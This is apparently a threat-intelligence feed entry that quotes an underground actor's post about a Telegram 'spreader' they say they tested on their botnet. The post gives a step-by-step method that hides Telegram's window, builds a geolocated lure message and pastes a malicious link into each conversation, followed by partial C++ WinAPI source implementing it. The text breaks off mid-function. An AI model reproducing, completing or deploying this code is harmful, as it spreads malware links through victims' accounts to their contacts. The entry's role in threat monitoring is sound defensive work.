November 27, 2020 at 12:43PM

■□□□□ #unconfirmed

Following is a quote from a source / Actor:

I tested it on my botnet and it generated shitload of traffic, alot of people told me it’s not easy, not possible bla bla, so this was one more reason for me to make one.

1. Check Telegram path exist
2. Check if process Telegram.exe is running
3. If not, start Telegram.exe, sleeps for 30 second
4. Check process Telegram.exe
5. If running, spreader gets GEO of current computer on site :
– For example if country is RU, message will be: “Best photo) link”

6. Sets Clipboard data with message generated with GEO + your link “Best photo) link”
7. If ok, it sets windows out box, so user won’t see the Telegram window anymore
8. Setfocus on Telegram window
9. Click crtl + menu + home (it will focus the first convo in list)
10. Goes into for loop + presses ctrl + TAB (it select new convo), since right now there is no option to calculate how many convos it will spam all after each other for the time you config, in KillThread is Sleep (10000); // 10 seconds
11. Stimulaty ctrl + v (paste) as our message is in clipboard it will paste it in convo window + enter enter 3 times (on slow computer it takes a bit longer till you see confirm)

So you if someone wants to make it better then update it, for everyone, I got no time to work on it right now., Lot can be changed, people can learn from it, have fun.

    ExpandEnvironmentStringsW(L”%appdata%”, wszAppData, sizeof(wszAppData));

    wsprintfW(wszTelegramPath, L”%ls\\Telegram Desktop\\Telegram.exe”, wszAppData);
    if (PathFileExistsW(wszTelegramPath))
        if (IsProcessRunning(“Telegram.exe”) == false)
            ShellExecuteW(NULL, L”open”, wszTelegramPath, NULL, NULL, SW_SHOW);


        if (IsProcessRunning(“Telegram.exe”) == true)
            HINTERNET hOpen, hURL;

            DWORD dwRead;

            char *geo;
            char szData[MAX_PATH];
            WCHAR wszGEOMsg[50];
            WCHAR wszSpreadMsg[500];
            bool GetGEOOk = false;
            hOpen = InternetOpen(“Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36”, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);

            if (hOpen != NULL)
                hURL = InternetOpenUrl(hOpen, “”, NULL, 0, 0, 0);

                if (hURL != NULL)

                    InternetReadFile(hURL, szData, sizeof(szData) – 1, &dwRead) && dwRead != 0;
                    geo = strchr(szData, ‘>’);
                    if (geo)